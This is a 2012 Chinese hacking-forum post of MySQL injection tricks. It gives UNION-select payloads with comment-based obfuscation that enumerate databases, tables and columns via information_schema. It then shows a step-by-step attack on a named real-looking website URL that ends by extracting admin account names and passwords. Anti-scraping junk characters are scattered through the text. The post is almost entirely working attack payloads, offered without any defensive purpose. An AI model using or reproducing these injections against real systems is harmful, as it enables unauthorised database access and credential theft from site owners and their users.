找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2087|回复: 0
打印 上一主题 下一主题

mysql注入技巧

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:29:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
查库
: j+ _4 P5 ~$ |& r
5 w1 l; U# ?( W2 f1 Bid=-1 union select 1,..,SCHEMA_NAME,n  from/**/information_schema.SCHEMATA limit 1,1/*
9 Z- A# q6 T  H$ V0 {
5 u2 l7 M1 l+ Y' i查表
% U: }7 R$ H: y4 G: w2 m
; b) Q0 b  Y: C  Uid=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1# c" n# P/ @. r- f, R6 g
. ~7 `1 @. c- e- W
查段! {' W! L' `1 y

$ u7 i* O; q9 T7 z& vid=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,15 _7 F. z: D: H% O; ~
% S3 Y, y: s' @' m

6 ^* v% A# P, A) E* X: x0 omysql5高级注入方法暴表3 D! W) G$ }/ G3 ^' J

- [3 F4 h( L& W+ \例子如下:/ N7 u) F5 @4 ^7 p; ?. c
9 u/ p; N, Y. ^
1.爆表
5 g4 ^) T7 b$ T$ {- k! p" j% {7 C3 nhttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*    (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)
4 Z" _0 {" f& n5 F: G5 q4 E) W7 o这样爆到第4个时出现了admin_user表。, r  |1 w8 g1 `
/ e+ U& y; k2 L. P, E% ?
2.暴字段
; K/ B& A' D7 F1 mhttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*
8 K' c  r* G6 R! ]5 Z- m3 J6 p& T: e- D0 J

3 S3 j! M8 d9 B+ o( F3 ^1 R3.爆密码8 ~7 y( l& B" r
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/* / ~) k- L' S! `) n: j

4 l- g9 k" R! V3 F7 Z- e. g3 ^" [- x/ s: {9 m
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表